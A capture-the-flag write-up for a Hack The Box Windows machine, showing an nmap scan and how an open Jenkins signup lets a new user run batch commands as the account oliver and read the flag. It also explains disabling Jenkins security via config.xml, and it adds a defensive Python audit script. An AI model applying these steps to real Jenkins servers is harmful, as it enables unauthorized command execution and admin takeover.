Category: Fullpwn

Solver: lmarschk

Flag: HTB{c1_cd_c00k3d_up_1337!}

Writeup

When scanning the machine, we get the following results:

Nmap scan report for 10.129.96.74
Host is up (0.036s latency).
Not shown: 65532 filtered ports
PORT     STATE SERVICE VERSION
80/tcp   open  http    Microsoft IIS httpd 10.0
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Mega Engines
5985/tcp open  http    Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
8080/tcp open  http    Jetty 9.4.43.v20210629
| http-robots.txt: 1 disallowed entry
|_/
|_http-server-header: Jetty(9.4.43.v20210629)
|_http-title: Site doesn't have a title (text/html;charset=utf-8).
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 109.79 seconds

When looking at port 8080, we find a Jenkins instance with an open registration form. After registering there, we can create a new project via New Item -> Freestyle Project.

After creating the job, we can add a build step named Execute Windows batch command. With it we can execute commands on the host system, as this Jenkins instance is configured to run jobs as the user oliver.

To trigger the job, we have to enable Trigger build remotely. To do so, we add an authentication token that allows triggering a single build. We set the token to token, so our URL is http://10.129.96.74:8080/job/HackIt/build?token=token.

The output of the job script can be read in the Jenkins web UI. From that output we are able to find the file C:\, which contains the flag.

Our full batch job script is:

REM show which account Jenkins runs the job as
whoami

REM walk the file system from the drive root down to oliver's profile
dir C:\
dir C:\Users
dir C:\Users\oliver
dir C:\Users\oliver\Desktop
dir C:\Users\oliver\Documents

REM confirm the flag file exists, then print its contents to the job output
dir C:\Users\oliver\Desktop\user.txt
more C:\Users\oliver\Desktop\user.txt

Further notes

By modifying the Jenkins configuration file, it is also possible to gain full administrative access to the Jenkins instance. To achieve that, we edit config.xml in the Jenkins configuration directory (its path is stored in the environment variable JENKINS_HOME) and set the value useSecurity to false. To apply the change, Jenkins has to be restarted, which can be done by running jenkins.exe restart. Afterwards, the user we created is effectively an admin user on Jenkins.
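The two settings that made this box fall, open self-registration (port 8080 above) and the useSecurity switch in config.xml, can both be checked from the file itself. The following audit script is an added example and not part of the original writeup; it assumes the element and class names Jenkins core writes to config.xml (useSecurity, securityRealm/disableSignup, authorizationStrategy), and the sample document inside it is constructed for the example.

```python
# Added example (not from the writeup): audit a Jenkins config.xml from
# JENKINS_HOME for the settings that let a self-registered user run
# arbitrary build steps: security off, open signup, and the
# "logged-in users can do anything" authorization strategy.
import xml.etree.ElementTree as ET

# Class names as written by Jenkins core into config.xml.
SIGNUP_REALM = "hudson.security.HudsonPrivateSecurityRealm"
FULL_CONTROL = "hudson.security.FullControlOnceLoggedInAuthorizationStrategy"


def audit_jenkins_config(xml_text: str) -> list[str]:
    """Return a list of findings (empty list means nothing flagged)."""
    root = ET.fromstring(xml_text)
    findings = []

    # 1. Is authentication enabled at all? (This is the value the writeup flips.)
    use_security = root.findtext("useSecurity", default="").strip().lower()
    if use_security != "true":
        findings.append("useSecurity is not true: Jenkins runs without authentication")

    # 2. Jenkins' own user database with signup still open.
    realm = root.find("securityRealm")
    if realm is not None and realm.get("class") == SIGNUP_REALM:
        signup_off = realm.findtext("disableSignup", default="false").strip().lower()
        if signup_off != "true":
            findings.append("self-registration is enabled: anyone can create an account")

    # 3. Any authenticated user gets full control, i.e. may create and run jobs.
    authz = root.find("authorizationStrategy")
    if authz is not None and authz.get("class") == FULL_CONTROL:
        findings.append("FullControlOnceLoggedIn: every logged-in user can create and run jobs")

    return findings


# Constructed sample that mirrors the state of the box: security on, but
# open signup combined with full control for any logged-in user.
SAMPLE_CONFIG = """<?xml version='1.0' encoding='UTF-8'?>
<hudson>
  <useSecurity>true</useSecurity>
  <authorizationStrategy class="hudson.security.FullControlOnceLoggedInAuthorizationStrategy">
    <denyAnonymousReadAccess>true</denyAnonymousReadAccess>
  </authorizationStrategy>
  <securityRealm class="hudson.security.HudsonPrivateSecurityRealm">
    <disableSignup>false</disableSignup>
    <enableCaptcha>false</enableCaptcha>
  </securityRealm>
</hudson>
"""

if __name__ == "__main__":
    for finding in audit_jenkins_config(SAMPLE_CONFIG):
        print("-", finding)
```

Running it against a real instance means reading %JENKINS_HOME%\config.xml on the controller; a hardened file yields an empty list.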

With that done, we are also able to execute Groovy scripts without creating a job. Unfortunately, as the machine blocks all outgoing network connections, we were not able to fetch any data from external sources or establish a reverse shell.